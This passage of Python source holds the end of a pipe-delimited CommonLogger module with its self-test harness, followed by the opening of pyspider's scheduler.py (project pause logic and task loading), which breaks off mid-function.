if key == 'rotateMethod' and value.lower() in ['time', 'size', 'none'] and self._rotateMethod != value:
self._rotateMethod = value.lower()
ReopenLogFile = True
elif key == 'timeRotateIntervalType' and value in ['S', 'M', 'H', 'D', 'W0', 'W1', 'W2', 'W3', 'W4', 'W5', 'W6', 'midnight']:
self._timeRotateIntervalType = value
ReopenLogFile = True
elif key == 'timeRotateInterval' and int( value ) > 0:
self._timeRotateInterval = int( value )
ReopenLogFile = True
elif key == 'sizeMaxBytes' and int( value ) >= 0:
self._sizeMaxBytes = int( value )
ReopenLogFile = True
elif key == 'sizeRotateMode' and value in ['a']:
self._sizeRotateMode = value
ReopenLogFile = True
elif key == 'backupCount' and int( value ) >= 0:
self._backupCount = int( value )
ReopenLogFile = True
elif key == self._logKey + 'SocketHost' and self._socketHost != value:
self._socketHost = value
ReopenLogFile = True
elif key == self._logKey + 'SocketPort' and self._socketPort > 0 and self._socketPort != int( value ):
self._socketPort = int( value )
ReopenLogFile = True
elif key == self._logKey + 'LogLevel' and self._logLevelThreshold != self._intLogLevel( value.upper() ):
self._logLevelThreshold = self._intLogLevel(value.upper())
elif key == self._logKey + 'LogType' and self._typeLogger != value and value.lower() in ['filelogger', 'stdoutlogger', 'stderrlogger', 'socketlogger', 'nulllogger']:
self._typeLogger = value.lower()
ReopenLogFile = True
elif key == self._logKey + 'Style':
self._fields["style"] = value
self._resetStyleField()
elif key == self._logKey and self._logFile != value:
logFile = value
ReopenLogFile = True
if ReopenLogFile:
with self._logLock:
self._logger.removeHandler(self._logHandler)
self._logFile = logFile
self._createLogger()
except Exception as err:
pass
time.sleep(5)
def setFields(self, **kwargs):
"""Set default values for log fields.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
for key in ['style', 'requestID', 'serviceInstanceID', 'threadID', 'serverName', 'serviceName', 'instanceUUID', \
'severity', 'serverIPAddress', 'server', 'IPAddress', 'className', 'timer', \
'partnerName', 'targetEntity', 'targetServiceName', 'statusCode', 'responseCode', \
'responseDescription', 'processKey', 'targetVirtualEntity', 'customField1', \
'customField2', 'customField3', 'customField4', 'errorCategory', 'errorCode', \
'errorDescription' ]:
if key in kwargs:
if kwargs[key] != None:
self._fields[key] = kwargs[key]
elif key in self._fields:
del self._fields[key]
self._defaultServerInfo()
def debug(self, message, **kwargs):
"""Write a DEBUG level message to the log file.
Arguments:
message -- value for the last log record field.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('DEBUG', message, **kwargs)
def info(self, message, **kwargs):
"""Write an INFO level message to the log file.
Arguments:
message -- value for the last log record field.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('INFO', message, **kwargs)
def warn(self, message, **kwargs):
"""Write a WARN level message to the log file.
Arguments:
message -- value for the last log record field.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('WARN', message, **kwargs)
def error(self, message, **kwargs):
"""Write an ERROR level message to the log file.
Arguments:
message -- value for the last log record field.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('ERROR', message, **kwargs)
def fatal(self, message, **kwargs):
"""Write a FATAL level message to the log file.
Arguments:
message -- value for the last log record field.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('FATAL', message, **kwargs)
def _log(self, logLevel, message, **kwargs):
"""Write a message to the log file.
Arguments:
logLevel -- value ('DEBUG', 'INFO', 'WARN', 'ERROR', 'FATAL', ...) for the log record.
message -- value for the last log record field.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
# timestamp will automatically be inserted
style = int(self._getVal('style', '', **kwargs))
requestID = self._getVal('requestID', '', **kwargs)
serviceInstanceID = self._getVal('serviceInstanceID', '', **kwargs)
        threadID = self._getVal('threadID', threading.current_thread().name, **kwargs)
serverName = self._getVal('serverName', '', **kwargs)
serviceName = self._getVal('serviceName', '', **kwargs)
instanceUUID = self._getVal('instanceUUID', '', **kwargs)
upperLogLevel = self._noSep(logLevel.upper())
severity = self._getVal('severity', '', **kwargs)
serverIPAddress = self._getVal('serverIPAddress', '', **kwargs)
server = self._getVal('server', '', **kwargs)
IPAddress = self._getVal('IPAddress', '', **kwargs)
className = self._getVal('className', '', **kwargs)
timer = self._getVal('timer', '', **kwargs)
partnerName = self._getVal('partnerName', '', **kwargs)
targetEntity = self._getVal('targetEntity', '', **kwargs)
targetServiceName = self._getVal('targetServiceName', '', **kwargs)
statusCode = self._getVal('statusCode', '', **kwargs)
responseCode = self._getVal('responseCode', '', **kwargs)
responseDescription = self._noSep(self._getVal('responseDescription', '', **kwargs))
processKey = self._getVal('processKey', '', **kwargs)
targetVirtualEntity = self._getVal('targetVirtualEntity', '', **kwargs)
customField1 = self._getVal('customField1', '', **kwargs)
customField2 = self._getVal('customField2', '', **kwargs)
customField3 = self._getVal('customField3', '', **kwargs)
customField4 = self._getVal('customField4', '', **kwargs)
errorCategory = self._getVal('errorCategory', '', **kwargs)
errorCode = self._getVal('errorCode', '', **kwargs)
errorDescription = self._noSep(self._getVal('errorDescription', '', **kwargs))
detailMessage = self._noSep(message)
if bool(re.match(r" *$", detailMessage)):
return # don't log empty messages
useLevel = self._intLogLevel(upperLogLevel)
if useLevel >= self._logLevelThreshold:
with self._logLock:
if style == CommonLogger.ErrorFile:
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, threadID, serviceName, partnerName, targetEntity, targetServiceName,
errorCategory, errorCode, errorDescription, detailMessage))
elif style == CommonLogger.DebugFile:
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, threadID, serverName, serviceName, instanceUUID, upperLogLevel,
severity, serverIPAddress, server, IPAddress, className, timer, detailMessage))
elif style == CommonLogger.AuditFile:
endAuditTime, endAuditMsec = self._getTime()
if self._begTime is not None:
d = { 'begtime': self._begTime, 'begmsecs': self._begMsec, 'endtime': endAuditTime, 'endmsecs': endAuditMsec }
else:
d = { 'begtime': endAuditTime, 'begmsecs': endAuditMsec, 'endtime': endAuditTime, 'endmsecs': endAuditMsec }
self._begTime = None
unused = ""
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, serviceInstanceID, threadID, serverName, serviceName, partnerName,
statusCode, responseCode, responseDescription, instanceUUID, upperLogLevel,
severity, serverIPAddress, timer, server, IPAddress, className, unused,
processKey, customField1, customField2, customField3, customField4, detailMessage), extra=d)
elif style == CommonLogger.MetricsFile:
endMetricsTime, endMetricsMsec = self._getTime()
if self._begTime is not None:
d = { 'begtime': self._begTime, 'begmsecs': self._begMsec, 'endtime': endMetricsTime, 'endmsecs': endMetricsMsec }
else:
d = { 'begtime': endMetricsTime, 'begmsecs': endMetricsMsec, 'endtime': endMetricsTime, 'endmsecs': endMetricsMsec }
self._begTime = None
unused = ""
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, serviceInstanceID, threadID, serverName, serviceName, partnerName,
targetEntity, targetServiceName, statusCode, responseCode, responseDescription,
instanceUUID, upperLogLevel, severity, serverIPAddress, timer, server, IPAddress,
className, unused, processKey, targetVirtualEntity, customField1, customField2,
customField3, customField4, detailMessage), extra=d)
else:
print("!!!!!!!!!!!!!!!! style not set: %s" % self._fields["style"])
def _getTime(self):
ct = time.time()
lt = time.localtime(ct)
return (time.strftime(CommonLogger.DateFmt, lt), (ct - int(ct)) * 1000)
def setStartRecordEvent(self):
"""
Set the start time to be saved for both audit and metrics records
"""
self._begTime, self._begMsec = self._getTime()
def _getVal(self, key, default, **kwargs):
val = self._fields.get(key)
if key in kwargs: val = kwargs[key]
if val is None: val = default
return self._noSep(val)
def _noSep(self, message):
if message is None: return ''
return re.sub(r'[\|\n]', ' ', str(message))
def _intLogLevel(self, logLevel):
if logLevel == 'FATAL': useLevel = 50
elif logLevel == 'ERROR': useLevel = 40
elif logLevel == 'WARN': useLevel = 30
elif logLevel == 'INFO': useLevel = 20
elif logLevel == 'DEBUG': useLevel = 10
else: useLevel = 0
return useLevel
def _mkdir_p(self, filename):
"""Create missing directories from a full filename path like mkdir -p"""
if filename is None:
return
folder=os.path.dirname(filename)
if folder == "":
return
if not os.path.exists(folder):
try:
os.makedirs(folder)
except OSError as err:
print("error number %d creating %s directory to hold %s logfile: %s" %(err.errno, err.filename, filename, err.strerror), file=sys.stderr)
sys.exit(2)
except Exception as err:
print("error creating %s directory to hold %s logfile: %s" %(folder, filename, str(err)), file=sys.stderr)
sys.exit(2)
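# Editor's usage sketch (not part of the original module): assuming a config file of
# the kind written by the test harness below, a typical caller creates one
# CommonLogger per log type and brackets timed work with setStartRecordEvent().
# Field values below are illustrative only.
def _example_audit_usage(configfile):
    audit = CommonLogger(configfile, "audit", style=CommonLogger.AuditFile,
                         serviceName="exampleService")
    audit.setStartRecordEvent()
    # ... perform the audited operation here ...
    audit.info("operation complete", statusCode="COMPLETE", responseCode="200")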
def __checkTime1(line):
    format = r'[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3}[+]00:00[|]'
m = re.match(format, line)
if not m:
print("ERROR: time string did not match proper time format, %s" %line)
print("\t: format=%s" % format)
return 1
return 0
def __checkTime2(line, different):
    format = r'[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:([0-9]{2}),([0-9]{3})[+]00:00[|][0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:([0-9]{2}),([0-9]{3})[+]00:00[|]'
m = re.match(format, line)
if not m:
print("ERROR: time strings did not match proper time format, %s" %line)
print("\t: format=%s" % format)
return 1
second1 = int(m.group(1))
msec1 = int(m.group(2))
second2 = int(m.group(3))
msec2 = int(m.group(4))
if second1 > second2: second2 += 60
t1 = second1 * 1000 + msec1
t2 = second2 * 1000 + msec2
diff = t2 - t1
# print("t1=%d (%d,%d) t2=%d (%d,%d), diff = %d" % (t1, second1, msec1, t2, second2, msec2, diff))
if different:
if diff < 500:
print("ERROR: times did not differ enough: %s" % line)
return 1
else:
if diff > 10:
print("ERROR: times were too far apart: %s" % line)
return 1
return 0
def __checkLog(logfile, numLines, numFields):
lineCount = 0
errorCount = 0
with open(logfile, "r") as fp:
for line in fp:
# print("saw line %s" % line)
lineCount += 1
c = line.count('|')
if c != numFields:
print("ERROR: wrong number of fields. Expected %d, got %d: %s" % (numFields, c, line))
errorCount += 1
if re.search("should not appear", line):
print("ERROR: a line appeared that should not have appeared, %s" % line)
errorCount += 1
elif re.search("single time", line):
errorCount += __checkTime1(line)
elif re.search("time should be the same", line):
errorCount += __checkTime2(line, different=False)
elif re.search("time should be different", line):
errorCount += __checkTime2(line, different=True)
else:
print("ERROR: an unknown message appeared, %s" % line)
errorCount += 1
if lineCount != numLines:
print("ERROR: expected %d lines, but got %d lines" % (numLines, lineCount))
errorCount += 1
return errorCount
if __name__ == "__main__":
import os
keepLogs = False
spid = str(os.getpid())
if keepLogs:
spid = ""
logcfg = "/tmp/log" + spid + ".cfg"
errorLog = "/tmp/error" + spid + ".log"
metricsLog = "/tmp/metrics" + spid + ".log"
auditLog = "/tmp/audit" + spid + ".log"
debugLog = "/tmp/debug" + spid + ".log"
import atexit
def cleanupTmps():
for f in [ logcfg, errorLog, metricsLog, auditLog, debugLog ]:
try:
os.remove(f)
except:
pass
if not keepLogs:
atexit.register(cleanupTmps)
with open(logcfg, "w") as o:
o.write("error = " + errorLog + "\n" +
"errorLogLevel = WARN\n" +
"metrics = " + metricsLog + "\n" +
"metricsLogLevel = INFO\n" +
"audit = " + auditLog + "\n" +
"auditLogLevel = INFO\n" +
"debug = " + debugLog + "\n" +
"debugLogLevel = DEBUG\n")
import uuid
instanceUUID = uuid.uuid1()
serviceName = "testharness"
errorLogger = CommonLogger(logcfg, "error", style=CommonLogger.ErrorFile, instanceUUID=instanceUUID, serviceName=serviceName)
debugLogger = CommonLogger(logcfg, "debug", style=CommonLogger.DebugFile, instanceUUID=instanceUUID, serviceName=serviceName)
auditLogger = CommonLogger(logcfg, "audit", style=CommonLogger.AuditFile, instanceUUID=instanceUUID, serviceName=serviceName)
metricsLogger = CommonLogger(logcfg, "metrics", style=CommonLogger.MetricsFile, instanceUUID=instanceUUID, serviceName=serviceName)
testsRun = 0
errorCount = 0
errorLogger.debug("error calling debug (should not appear)")
errorLogger.info("error calling info (should not appear)")
errorLogger.warn("error calling warn (single time)")
errorLogger.error("error calling error (single time)")
errorLogger.setStartRecordEvent()
time.sleep(1)
errorLogger.fatal("error calling fatal, after setStartRecordEvent and sleep (start should be ignored, single time)")
testsRun += 6
errorCount += __checkLog(errorLog, 3, 10)
auditLogger.debug("audit calling debug (should not appear)")
auditLogger.info("audit calling info (time should be the same)")
auditLogger.warn("audit calling warn (time should be the same)")
auditLogger.error("audit calling error (time should be the same)")
auditLogger.setStartRecordEvent()
time.sleep(1)
auditLogger.fatal("audit calling fatal, after setStartRecordEvent and sleep, time should be different)")
testsRun += 6
errorCount += __checkLog(auditLog, 4, 25)
debugLogger.debug("debug calling debug (single time)")
debugLogger.info("debug calling info (single time)")
debugLogger.warn("debug calling warn (single time)")
debugLogger.setStartRecordEvent()
time.sleep(1)
debugLogger.error("debug calling error, after SetStartRecordEvent and sleep (start should be ignored, single time)")
debugLogger.fatal("debug calling fatal (single time)")
errorCount += __checkLog(debugLog, 5, 13)
testsRun += 6
metricsLogger.debug("metrics calling debug (should not appear)")
metricsLogger.info("metrics calling info (time should be the same)")
metricsLogger.warn("metrics calling warn (time should be the same)")
metricsLogger.setStartRecordEvent()
time.sleep(1)
metricsLogger.error("metrics calling error, after SetStartRecordEvent and sleep, time should be different")
metricsLogger.fatal("metrics calling fatal (time should be the same)")
testsRun += 6
errorCount += __checkLog(metricsLog, 4, 28)
print("%d tests run, %d errors found" % (testsRun, errorCount))
|
scheduler.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
                if 'process' not in task['track']:
                    logger.error('process not in task, %r', task)
                    continue
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if self.md5sum != md5sum:
self.waiting_get_info = True
self.md5sum = md5sum
if self.waiting_get_info and self.active:
self._send_on_get_info = True
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
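# Editor's illustration (not part of pyspider): a condensed, standalone sketch of the
# pause state machine documented in Project.paused above. `recent_ok` is assumed to be
# a most-recent-first list of process results for ordinary (non TASK_PACK) tasks; the
# default constants mirror the Scheduler defaults defined below.
def _sketch_pause_transition(state, recent_ok, paused_since, now,
                             fail_pause_num=10, pause_time=300, unpause_check_num=3):
    if state == 'unpaused':
        head = recent_ok[:fail_pause_num]
        if len(head) == fail_pause_num and not any(head):
            return 'paused', now                # fail_pause_num failures in a row
    elif state == 'paused' and paused_since + pause_time < now:
        return 'checking', paused_since         # let a probe batch of tasks run
    elif state == 'checking':
        head = recent_ok[:unpause_check_num]
        if len(head) == unpause_check_num:
            # all probes failed -> pause again; any success -> resume
            return ('paused', now) if not any(head) else ('unpaused', paused_since)
    return state, paused_since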
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 10
PAUSE_TIME = 5*60
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
    STATUS_PACK = 2  # currently not used
    REQUEST_PACK = 3  # currently not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
            # update project runtime info from processor by sending a _on_get_info
            # request; the result comes back in the status pack's track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
        # load the task queue when the project is running and drop it when the project is stopped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
